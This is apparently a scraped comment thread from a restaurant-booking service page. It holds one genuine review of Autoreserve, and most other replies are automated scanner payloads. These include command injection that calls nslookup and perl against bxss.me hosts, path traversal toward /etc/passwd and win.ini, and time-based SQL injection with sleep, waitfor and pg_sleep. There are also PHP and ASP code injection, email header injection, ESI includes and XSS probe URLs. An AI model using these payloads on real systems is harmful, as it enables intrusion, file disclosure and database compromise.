&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&'\"`0&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&`'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(102).concat(72).concat(120).concat(83)+(require"socket"
Socket.gethostbyname("hitbg"+"ouegvlqp0a3d2.bxss.me.")[3].to_s)+"
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitvoueqpzvbg87102.bxss.me||perl -e "gethostbyname('hitvoueqpzvbg87102.bxss.me')")
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(99).concat(66).concat(104).concat(90)+(require'socket'
Socket.gethostbyname('hitez'+'wpjellxue1b27.bxss.me.')[3].to_s)+'
re: guest
Http://bxss.me/t/fit.txt
re: guest
file:///etc/passwd
re: guest
`(nslookup hitvdonfbvisp396c5.bxss.me||perl -e "gethostbyname('hitvdonfbvisp396c5.bxss.me')")`
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")|(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")&(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")
re: guest
/etc/shells
re: guest
/WEB-INF/web.xml
re: guest
c:/windows/win.ini
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
bxss.me
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
';print(md5(31337));$a='
re: guest
/../../../../../../../../../../boot.ini
re: guest
";print(md5(31337));$a="
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
'.print(md5(31337)).'
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+716-716-1=0+0+0+1 --
re: guest
-1 OR 3+716-716-1=0+0+0+1 --
re: guest
-1 OR 2+249-249-1=0+0+0+1
re: guest
-1 OR 3+249-249-1=0+0+0+1
re: guest
-1' OR 2+884-884-1=0+0+0+1 --
re: guest
-1' OR 3+884-884-1=0+0+0+1 --
re: guest
-1' OR 2+556-556-1=0+0+0+1 or '4K5zCJv3'='
re: guest
-1' OR 3+556-556-1=0+0+0+1 or '4K5zCJv3'='
re: guest
-1" OR 2+975-975-1=0+0+0+1 --
re: guest
-1" OR 3+975-975-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
ww0tV5jQ'; waitfor delay '0:0:15' --
re: guest
-5 OR 337=(SELECT 337 FROM PG_SLEEP(15))--
re: guest
-5) OR 573=(SELECT 573 FROM PG_SLEEP(15))--
re: guest
-1)) OR 281=(SELECT 281 FROM PG_SLEEP(15))--
re: guest
W9GN419h' OR 355=(SELECT 355 FROM PG_SLEEP(15))--
re: guest
Hi4GjAeP') OR 882=(SELECT 882 FROM PG_SLEEP(15))--
re: guest
3MPIpRvn')) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@uJusW
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
Tried using it to book Sharikimon Chawanbu, and received an unsuccessful response after 3 days (they tried for 2 days but couldn’t get through).
Succeeded in reserving twice on previous occasions by simply calling, and didn’t find it to be a terribly hard reservation to make. So I wasn’t impressed with Autoreserve, haha.
re: JJ
BfMfVSXp
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+22-22-1=0+0+0+1
re: JJ
-1 OR 3+22-22-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
WXFC0K64'; waitfor delay '0:0:15' --
re: JJ
-5 OR 518=(SELECT 518 FROM PG_SLEEP(15))--
re: JJ
ZoWaSAA9
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+81-81-1=0+0+0+1
re: JJ
-1 OR 3+81-81-1=0+0+0+1
re: JJ
-5) OR 470=(SELECT 470 FROM PG_SLEEP(15))--
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
-1)) OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
DiLxp81h' OR 757=(SELECT 757 FROM PG_SLEEP(15))--
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
9ZbxIKIQ') OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
87aUNrUe')) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
FoQLWcBl'; waitfor delay '0:0:15' --
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@JSmRR
re: JJ
-5 OR 120=(SELECT 120 FROM PG_SLEEP(15))--
re: JJ
-5) OR 727=(SELECT 727 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 114=(SELECT 114 FROM PG_SLEEP(15))--
re: JJ
y4J2myeG' OR 934=(SELECT 934 FROM PG_SLEEP(15))--
re: JJ
4r24BZOY') OR 197=(SELECT 197 FROM PG_SLEEP(15))--
re: JJ
uZJO7hnE')) OR 195=(SELECT 195 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@oySq6
re: JJ
1oI5CvbnO
re: JJ
response.write(9645929*9158520)
re: JJ
'+response.write(9645929*9158520)+'
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
%0abcc:074625.67-13768.67.6f84a.19990.2@bxss.me
re: JJ
"+response.write(9645929*9158520)+"
re: JJ
to@example.com>%0d%0abcc:074625.67-13769.67.6f84a.19990.2@bxss.me
re: JJ
${9999612+9999044}
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
)
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
'.gethostbyname(lc('hitdw'.'vihexltiee1cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(74).chr(118).chr(68).'
re: JJ
!(()&&!|*|*|
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
".gethostbyname(lc("hitix"."npoatckpefa99.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(68).chr(118).chr(70)."
re: JJ
^(#$!@#$)(()))******
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
echo obgxph$()\ zmfnhx\nz^xyu||a #' &echo obgxph$()\ zmfnhx\nz^xyu||a #|" &echo obgxph$()\ zmfnhx\nz^xyu||a #
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
&echo bgrsbq$()\ reapni\nz^xyu||a #' &echo bgrsbq$()\ reapni\nz^xyu||a #|" &echo bgrsbq$()\ reapni\nz^xyu||a #
re: JJ
/etc/passwd
re: JJ
|echo txtazf$()\ uitpun\nz^xyu||a #' |echo txtazf$()\ uitpun\nz^xyu||a #|" |echo txtazf$()\ uitpun\nz^xyu||a #
re: JJ
%2fetc%2fpasswd
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
"+"A".concat(70-3).concat(22*4).concat(116).concat(86).concat(116).concat(78)+(require"socket"
Socket.gethostbyname("hitdy"+"sxjrgpipb4122.bxss.me.")[3].to_s)+"
re: JJ
(nslookup hitruzjwfjost835e8.bxss.me||perl -e "gethostbyname('hitruzjwfjost835e8.bxss.me')")
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
bxss.me/t/xss.html?%00
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(102).concat(90).concat(113).concat(82)+(require'socket'
Socket.gethostbyname('hitas'+'unvvfovz1f2cb.bxss.me.')[3].to_s)+'
re: JJ
$(nslookup hitsvquboiphlc2516.bxss.me||perl -e "gethostbyname('hitsvquboiphlc2516.bxss.me')")
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
&nslookup hityhsdwqbvgw768db.bxss.me&'\"`0&nslookup hityhsdwqbvgw768db.bxss.me&`'
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&'\"`0&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&`'
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
/etc/shells
re: JJ
|(nslookup hitlugugqolaqfae79.bxss.me||perl -e "gethostbyname('hitlugugqolaqfae79.bxss.me')")
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
c:/windows/win.ini
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
`(nslookup hituanfeoslzub509f.bxss.me||perl -e "gethostbyname('hituanfeoslzub509f.bxss.me')")`
re: JJ
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
bxss.me
re: JJ
'"
re: JJ
';print(md5(31337));$a='
re: JJ
;(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")|(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")&(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")
re: JJ
file:///etc/passwd
re: JJ
<!--
re: JJ
";print(md5(31337));$a="
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
${@print(md5(31337))}
re: JJ
/WEB-INF/web.xml
re: JJ
${@print(md5(31337))}\
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
'.print(md5(31337)).'
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.